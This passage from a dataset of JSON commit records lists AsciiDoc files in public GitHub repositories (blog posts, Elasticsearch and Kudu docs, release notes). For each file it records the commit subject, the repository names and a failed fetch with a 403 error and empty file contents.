2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed15b3729d7a9a6b1e07b352a573b69ace232534","subject":"Update 2017-03-13-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","message":"Update 2017-03-13-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2017-03-13-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","new_file":"_posts\/2017-03-13-Hubpress-Usando-o-Travis-CI-para-gerar-feed-RSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62006590f93d81e498c65a059042f4a42bff855f","subject":"y2b create post $10 Mouse Vs. $70 Mouse","message":"y2b create post $10 Mouse Vs. $70 Mouse","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-05-10-Mouse-Vs-70-Mouse.adoc","new_file":"_posts\/2017-05-05-10-Mouse-Vs-70-Mouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae4aee2ff33707a0a68d5943e3bc650bbfe13ca0","subject":"fix: image\u306e\u30d1\u30b9\u4fee\u6b63","message":"fix: image\u306e\u30d1\u30b9\u4fee\u6b63\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d463401bca518073c5b80989da983ed13bd10cff","subject":"Update 2018-07-02-FW4SPL-1700-released.adoc","message":"Update 2018-07-02-FW4SPL-1700-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2018-07-02-FW4SPL-1700-released.adoc","new_file":"_posts\/2018-07-02-FW4SPL-1700-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7284c430d8a02879762cb23fa0ee7b9ab2b88684","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5229e69f24cbdeb306b636a2ece866a415a9bfd","subject":"y2b create post Gran Turismo 5 Collector's Edition Unboxing","message":"y2b create post Gran Turismo 5 Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-21-Gran-Turismo-5-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2012-01-21-Gran-Turismo-5-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49dd292808905954256f7b34ed79b0c2cfa93672","subject":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","message":"Update 2016-11-06-The-place-that-is-changing-my-perspectives.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7754aeb8ed8ae04e639066bddd73152755cbe43b","subject":"Update 2017-12-17-.adoc","message":"Update 2017-12-17-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-17-.adoc","new_file":"_posts\/2017-12-17-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01ccbd969d54054369ce1d9e239350498971b02f","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31ced6b5c87c0b30f8dd12b0c1b031320e4a7dfe","subject":"Create README.adoc","message":"Create README.adoc","repos":"rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python","old_file":"fade\/database\/README.adoc","new_file":"fade\/database\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rockwolf\/python.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ece8f7748c646d9e5be46c1eb360dcf29125cfdf","subject":"Create 2016-10-05-Date-Test.adoc","message":"Create 2016-10-05-Date-Test.adoc","repos":"pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io,pallewela\/pallewela.github.io","old_file":"_posts\/2016-10-05-Date-Test.adoc","new_file":"_posts\/2016-10-05-Date-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pallewela\/pallewela.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d476235dfaccd540ea3bdbe251b32a63ea0237df","subject":"Update 2018-08-25-Laravel56.adoc","message":"Update 2018-08-25-Laravel56.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56.adoc","new_file":"_posts\/2018-08-25-Laravel56.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be96aa5005761e045757d0369fd4918e4d6a60fe","subject":"Update 2016-08-21-Vim-is-awsome.adoc","message":"Update 2016-08-21-Vim-is-awsome.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-Vim-is-awsome.adoc","new_file":"_posts\/2016-08-21-Vim-is-awsome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fd73c88c9638ca0f1293a48bb20813d095f3470","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdd90286e1960611c994ffa2c4cd3626484c5bf6","subject":"Update READMY.adoc","message":"Update READMY.adoc","repos":"DmitryKubahov\/VESB","old_file":"collections\/READMY.adoc","new_file":"collections\/READMY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DmitryKubahov\/VESB.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e46e5e9ae65fec62494eaf45ffa07d8fe7f0216f","subject":"Blog: Hawkular Alerting Tutorial announcement (#285)","message":"Blog: Hawkular Alerting Tutorial announcement (#285)\n\n","repos":"hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/03\/14\/hawkular-alerting-tutorial.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/03\/14\/hawkular-alerting-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01206eb0167f7737de325c7c246162f3b5344acc","subject":"Fixed typo (cherry picked from commit 52e3d0bab1c09f428398ba3e04213289dca3bbeb)","message":"Fixed typo\n(cherry picked from commit 52e3d0bab1c09f428398ba3e04213289dca3bbeb)\n","repos":"takezoe\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecb0b4377e25f1f0ec0d611a4adac80ff8cc9dfd","subject":"Updated INSTALLATION.adoc: Fix the link to README.md \/ Customizing Paths","message":"Updated INSTALLATION.adoc: Fix the link to README.md \/ Customizing Paths\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/INSTALLATION.adoc","new_file":"doc\/INSTALLATION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0119daabff58dc62a33173290aa50d68cec8095","subject":"Import release notes for Groovy 2.3","message":"Import release notes for Groovy 2.3\n","repos":"sdkman\/sdkman-website,webkaz\/groovy-website,benignbala\/groovy-website,marc0der\/groovy-website,dmesu\/sdkman-website,m-ullrich\/groovy-website,sdkman\/sdkman-website,kevintanhongann\/groovy-website,kevintanhongann\/groovy-website,groovy\/groovy-website,rahulsom\/sdkman-website,marcoVermeulen\/groovy-website,rahulsom\/sdkman-website,marc0der\/groovy-website,webkaz\/groovy-website,dmesu\/sdkman-website,benignbala\/groovy-website,marcoVermeulen\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/releasenotes\/groovy-2.3.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-2.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dmesu\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"febb4bf7bc8f7fafcd94b893eb2ad0fe4b7d8648","subject":"Update removal_of_types.asciidoc","message":"Update removal_of_types.asciidoc\n\nFixed `include_in_type` -> `include_type_name`","repos":"sneivandt\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,mjason3\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,coding0011\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,strapdata\/elassandra,uschindler\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,wangtuo\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,masaruh\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,shreejay\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,fred84\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,vroyer\/elasticassandra,robin13\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch","old_file":"docs\/reference\/mapping\/removal_of_types.asciidoc","new_file":"docs\/reference\/mapping\/removal_of_types.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5cf56a846aade1a1843bac86cfc85f3094c1d3d7","subject":"docs: Remove incorrect warning","message":"docs: Remove incorrect warning\n\nCloses #25935\n","repos":"uschindler\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,mohit\/elasticsearch,HonzaKral\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch","old_file":"docs\/reference\/mapping\/types\/percolator.asciidoc","new_file":"docs\/reference\/mapping\/types\/percolator.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91d376f4cf04ec7806da2a51da1f65f82f21a5fb","subject":"Update footer.adoc to include a link to github","message":"Update footer.adoc to include a link to github\n","repos":"rumpelsepp\/snap","old_file":"man\/footer.adoc","new_file":"man\/footer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/snap.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a1adf411363378ec5bfc187bcd9dde2bee3cf20","subject":"Name and access resources","message":"Name and access resources\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Resources.adoc","new_file":"Best practices\/Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e9fd8c155e895af0c652267575c88b55172ce9e","subject":"Add a few more release notes for 0.9.0","message":"Add a few more release notes for 0.9.0\n\nChange-Id: Ibbd66838b51e467d4c4808fa09972d0cba717143\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3273\nTested-by: Kudu Jenkins\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b398826883ed3ae02a65cf265f5e217a3039db4","subject":"Update 2015-11-12-Da-Dom.adoc","message":"Update 2015-11-12-Da-Dom.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-12-Da-Dom.adoc","new_file":"_posts\/2015-11-12-Da-Dom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a48551028b5cee88151cdc1ef6faa457c14061f4","subject":"Updated tutorial: Use Grid::setColumns and Binder (#8698)","message":"Updated tutorial: Use Grid::setColumns and Binder (#8698)\n\n* Updated tutorial: Use Grid::setColumns\n\n* Updated tutorial: use Binder instead of BeanBinder\n","repos":"Darsstar\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,peterl1084\/framework,peterl1084\/framework,kironapublic\/vaadin,kironapublic\/vaadin,asashour\/framework,peterl1084\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,kironapublic\/vaadin,mstahv\/framework,mstahv\/framework,kironapublic\/vaadin,Darsstar\/framework,Darsstar\/framework,peterl1084\/framework,kironapublic\/vaadin,asashour\/framework,peterl1084\/framework","old_file":"documentation\/tutorial.adoc","new_file":"documentation\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f8edc6598b12a9e191bf2aa3d451dd3cdcaf702a","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"209b52527c3367e6536480e2b5ea083c2b2dfdb2","subject":"Update 2015-02-17-The-start-of-2015.adoc","message":"Update 2015-02-17-The-start-of-2015.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-17-The-start-of-2015.adoc","new_file":"_posts\/2015-02-17-The-start-of-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9109696382aa758c1e7798ec597cd7bed9fad761","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 